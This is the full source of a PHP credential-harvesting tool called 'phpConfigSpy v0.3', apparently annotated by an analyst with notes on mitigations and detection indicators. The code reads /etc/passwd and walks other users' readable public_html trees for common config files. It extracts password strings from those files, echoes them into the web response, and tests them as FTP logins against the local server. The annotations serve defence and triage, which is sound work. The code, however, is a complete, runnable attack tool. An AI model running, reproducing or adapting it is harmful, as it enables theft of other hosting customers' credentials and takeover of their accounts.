Code:
<?php
/* h-b@usa.com */
// Analyst annotation (code tokens unchanged; only line breaks and comments added).
// What this sample does, as far as the listing shows: it reads /etc/passwd to
// build a list of account names, keeps those whose /home/<user>/public_html/ is
// readable by the PHP process, walks each such tree for commonly named PHP
// config files, extracts a quoted string from the first line that mentions a
// password-like keyword, and tries that string as the FTP password of the same
// account against 127.0.0.1.
//
// Why it works on a host: every step relies on the web/PHP process being able
// to read other accounts' files. Relevant controls are per-account PHP
// execution (separate pools/uids), open_basedir, home and public_html
// permissions that exclude other users and the web server's shared uid, and
// never reusing the account/FTP password as a database password.
//
// Triage indicators visible in the code: the page title string
// 'phpConfigSpy v0.3', the '[+]', '[~]' and '[FTP]' output markers, a web
// process opening /etc/passwd followed by directory walks across /home, and
// FTP logins originating from loopback.
echo '<html><head><title>phpConfigSpy v0.3</title></head><body>';
// Aborts when safe_mode is enabled. safe_mode was removed in PHP 5.4, so it is
// not a control to rely on; use the isolation measures listed above instead.
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
// Removes the execution time limit so a long filesystem walk is not cut short;
// a long-running request from an unexpected script is itself a useful signal.
set_time_limit(0);
###################
// Stage 1: account enumeration from /etc/passwd (errors suppressed with @).
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();   // assigned here and not referenced again in this listing
$i = 0;
while(!feof($passwd))
{
  $str = fgets($passwd);
  // Ignores the first 36 lines; presumably meant to skip system accounts
  // (the listing does not say why 35 was chosen).
  if ($i > 35)
  {
    // The account name is the text before the first ':' of the passwd entry.
    $pos = strpos($str,':');
    $username = substr($str,0,$pos);
    // Assumes the conventional shared-hosting layout /home/<user>/public_html/.
    $dirz = '/home/'.$username.'/public_html/';
    if (($username != ''))
    {
      // Only accounts whose web root is readable by this process are kept.
      // If this test succeeds for another customer's directory, cross-account
      // read isolation is missing on the host.
      if (is_readable($dirz))
      {
        array_push($users,$username);
        array_push($pub,$dirz);
      }
    }
  }
  $i++;
}
###################
// Stage 2: report counts, then walk every collected web root.
echo '<br><br><textarea cols="80" rows="60">';
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
echo "[~] Searching for passwords in config files...\n\n";
foreach ($users as $user)
{
  $path = "/home/$user/public_html/";
  read_dir($path,$user);
}
echo "\n[+] Done\n";

// Recursively walks $path. For each readable entry: descends into directories,
// and for regular files whose name is in the fixed list below calls get_pass();
// a non-empty result is printed and handed to ftp_check() with $username.
function read_dir($path,$username)
{
  if ($handle = opendir($path))
  {
    while (false !== ($file = readdir($handle)))
    {
      $fpath = "$path$file";
      if (($file != '.') and ($file != '..'))
      {
        if (is_readable($fpath))
        {
          $dr = $fpath."/";
          if (is_dir($dr))
          {
            read_dir($dr,$username);
          }
          else
          {
            // Exact-name match against common application config/bootstrap
            // files. These are the files that should not be readable by other
            // accounts or by a shared web-server uid.
            if ( ($file=='config.php') or ($file=='config.inc.php') or ($file=='conf.php') or
                 ($file=='settings.php') or ($file=='setup.php') or ($file=='order.php') or
                 ($file=='dbconf.php') or ($file=='db.inc.php') or ($file=='dbconfig.php') or
                 ($file=='configuration.php') or ($file=='adminconfig.php') or ($file=='configoption.php') or
                 ($file=='ini.inc.php') or ($file=='configitem.php') or ($file=='db.inc.php') or
                 ($file=='dbconnect.php') or ($file=='conf-init.php') or ($file=='dbinfo.php') or
                 ($file=='connect.php') or ($file=='configure.php') or ($file=='smtp.php') or
                 ($file=='include.php') or ($file=='index.php') or ($file=='common.php') or
                 ($file=='config_global.php') or
                 ($file=='admin.php') or ($file=='db.php') or ($file=='connect.inc.php') or
                 ($file=='dbconnect.inc.php'))
            {
              $pass = get_pass($fpath);
              if ($pass != '')
              {
                // Recovered values are echoed into the response body, so the
                // HTTP response of this request contains the harvested data.
                echo "[+] $fpath\n$pass\n";
                ftp_check($username,$pass);
              }
            }
          }
        }
      }
    }
  }
}

// Opens the file at $link and scans it line by line. On the first line that
// contains one of the keywords below it applies a quoted-string regex and
// returns capture group 2; later lines are not examined. Returns nothing if no
// line contains a keyword.
function get_pass($link)
{
  @$config = fopen($link,'r');
  while(!feof($config))
  {
    $line = fgets($config);
    // Plain substring tests, so any line mentioning these words qualifies,
    // whether or not it actually holds a credential.
    if (strstr($line,'pass') or strstr($line,'pwd') or strstr($line,'db_pass') or strstr($line,'dbpass') or strstr($line,'passwd'))
    {
      if (strrpos($line,'"'))
      {
        preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
        $pass = str_replace("]=\"","",$pass);
      }
      else
      preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
      $pass = str_replace("]='","",$pass);
      return $pass[2];
    }
  }
}

// Tests $login/$pass against the FTP service on 127.0.0.1 and prints a
// '[FTP] ... Success !' line when the login is accepted. The attempts appear
// in FTP authentication logs with a loopback source address, so loopback
// should not be excluded from login-failure monitoring or rate limiting.
function ftp_check($login,$pass)
{
  @$ftp = ftp_connect('127.0.0.1');
  if ($ftp)
  {
    @$res = ftp_login($ftp,$login,$pass);
    if ($res)
    {
      echo '[FTP] '.$login.':'.$pass." Success !\n";
    }
    else ftp_quit($ftp);
  }
}
// Footer with the author credit strings; these literals are further static
// indicators for content scanning of uploaded files.
echo '</textarea><br><br>Coded by <b>Hack-Back</b> & <b>config-location-2@@8</b> <a href=http://www.hac-zone.com></a></body></html>';
?>